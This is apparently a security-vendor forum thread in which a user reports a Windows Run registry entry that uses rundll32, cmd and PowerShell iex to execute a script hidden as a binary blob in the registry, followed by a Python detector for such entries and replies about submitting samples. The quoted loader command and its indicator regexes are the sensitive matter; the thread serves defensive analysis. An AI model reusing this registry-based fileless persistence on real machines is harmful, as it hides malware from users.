strange power shell script

Dear Support,

Today I discovered a Windows 7 workstation that, during user access, was starting a strange PowerShell script.

Looking in the Run key of the registry I saw this string:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"


Looking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F I see this data.

(The byte data is much longer)


[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]


Could it be some kind of malware?
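The two registry values quoted in the post fit one pattern: a Run entry that launches PowerShell through rundll32 and cmd, then builds its script text from a binary blob stored at a GUID-named key under HKCU\Software\AppDataLow and runs it with iex, so no script file ever touches disk. The script below is an added example, not code from the post or from F-Secure. It parses a .reg export (the format the poster pasted, as produced by regedit's export function), flags Run entries that show these traits, and follows the Get-ItemProperty path to report what binary data sits at the referenced key. The sample export is constructed: it reproduces the two values from the post with the blob cut down to the lines shown, and adds a benign OneDrive autostart entry as a control. Python is used here so the check can run offline against an export copied off the affected machine.

```python
import re

# Constructed .reg-style export reproducing the two values quoted in the post,
# plus one ordinary autostart entry (also constructed) as a benign control.
# The binary blob keeps only the first lines the poster showed; the real one is longer.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
  5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
  2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8
'''

# Traits of the loader in the post, matched case-insensitively against each
# autostart command line: (label, regex).
INDICATORS = [
    ("rundll32 ShellExec_RunDLL used as a proxy launcher", r"rundll32\b.*shellexec_rundll"),
    ("PowerShell iex/Invoke-Expression of built-up text", r"powershell\b.*\b(iex|invoke-expression)\b"),
    ("script body fetched from the registry", r"get-itemproperty"),
    ("payload stored under HKCU\\Software\\AppDataLow", r"appdatalow"),
    ("console window hidden with start /min", r"start\s+/min"),
]

RUN_SUFFIX = r"\software\microsoft\windows\currentversion\run"


def _unescape(s):
    # .reg strings escape backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: data}}.
    String data is unescaped, hex: data becomes bytes, anything else is kept raw."""
    keys, current = {}, None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m or current is None:
            continue
        name, data = _unescape(m.group(1)), m.group(2)
        # hex data continues on following lines, each ending with a backslash
        while data.endswith("\\") and i < len(lines):
            data = data[:-1] + lines[i].strip()
            i += 1
        if data.startswith('"') and data.endswith('"'):
            keys[current][name] = _unescape(data[1:-1])
        elif data.lower().startswith("hex:"):
            keys[current][name] = bytes.fromhex(data[4:].replace(",", ""))
        else:
            keys[current][name] = data
    return keys


def locate_payload(cmd, keys):
    """Resolve the HKCU: path and value name that a Get-ItemProperty call reads,
    and report what the export holds at that key."""
    m = re.search(r"HKCU:\\([^'\"\s]+)[^)]*\)\.(\w+)", cmd, re.I)
    if not m:
        return None
    full = "HKEY_CURRENT_USER\\" + m.group(1)
    values = next((v for k, v in keys.items() if k.lower() == full.lower()), {})
    return {
        "key": full,
        "referenced_value": m.group(2),
        "referenced_value_present": m.group(2) in values,
        # sizes of every binary blob at that key, whatever it is called
        "binary_values": {n: len(d) for n, d in values.items() if isinstance(d, bytes)},
    }


def check_run_entries(keys):
    """Return {value_name: {...}} for Run entries matching at least one indicator."""
    findings = {}
    for key, values in keys.items():
        if not key.lower().endswith(RUN_SUFFIX):
            continue
        for name, cmd in values.items():
            if not isinstance(cmd, str):
                continue
            hits = [label for label, rx in INDICATORS if re.search(rx, cmd, re.I)]
            if hits:
                findings[name] = {"indicators": hits, "payload": locate_payload(cmd, keys)}
    return findings


if __name__ == "__main__":
    for name, f in check_run_entries(parse_reg(SAMPLE_REG)).items():
        print(f"{name}: {len(f['indicators'])} indicators -> {f['indicators']}")
        print("  payload:", f["payload"])
```

Run against the constructed export, only the cmstsitf entry is reported, with all five indicators, and the payload lookup shows that the value the command reads (chsbWNet) is not in the excerpt while a 71-byte Client32 blob is; on a full export the blob sizes and any extra value names at that key are what an analyst would hand to support along with the FSDIAG output.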

Answers

  • jamesch Posts: 125

    Hi tecnicogsn


    If you suspect that:
    • a clean file has been falsely detected as malicious, or
    • a file is malicious but has not been detected by our software,
    you can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link: https://www.f-secure.com/en/web/labs_global/submit-a-sample#sample-file
    1. Select the File Sample tab.
    2. Click Choose File, and attach your sample file.
      • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
      • Note: Subject and description should be written in English.
    3. Verify that you are not a robot with reCAPTCHA.
    4. Click Submit sample file.
    The sample submission is analyzed by our analysts and databases, and detection is updated if necessary.

    For more information on how you can submit a sample, read our Community article here.
  • etomcat Posts: 1,312

    Hello,


    I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.


    Best Regards: Tamas Feher, Hungary.